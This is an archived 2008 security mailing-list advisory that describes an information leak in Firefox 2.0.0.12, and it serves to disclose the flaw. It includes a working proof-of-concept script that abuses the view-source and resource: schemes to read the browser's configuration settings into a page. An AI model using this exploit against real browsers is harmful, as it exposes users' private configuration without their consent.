Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[NEWS] Firefox Information Leak Vulnerability

Subject: [NEWS] Firefox Information Leak Vulnerability
Date: 19 Mar 2008 09:44:42 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Firefox Information Leak Vulnerability
------------------------------------------------------------------------


SUMMARY

A vulnerability in Firefox allows remote attackers to enumerate all the 
configuration settings of the browser without requiring user authorization 
or interaction.

DETAILS

Vulnerable Systems:
 * Firefox version 2.0.0.12

In the vulnerability we make use of the 'view-source:' scheme that allows 
us to source out the 'resource:' scheme. With it, we can view the source 
of any file located in the 'resource:///' directory, which translates back 
to: file:///C:/Program Files/Mozilla Firefox/. Then we only include the 
file inside it and it becomes available to a new page's DOM, and so we are 
able to read all settings.

Other issues can emerge also, this is only a short-hand proof of concept. 
Like always, more is possible.

Exploit:
<script>

/*
 @name: Firefox <= 2.0.0.12 information leak pOc
 @date: Feb. 07 2008
 @author: Ronald van den Heetkamp
 @url: http://www.0x000000.com
*/

pref = function(a,b) {

   document.write( a + ' -> ' + b + '<br />');

};

</script>

<script src="view-source:resource:///greprefs/all.js"></script>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:hardwick.carl@gmail.com> 
carl hardwick.
The original article can be found at:  <http://www.0x000000.com/> 
http://www.0x000000.com/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [NEWS] Firefox Information Leak Vulnerability, SecuriTeam <=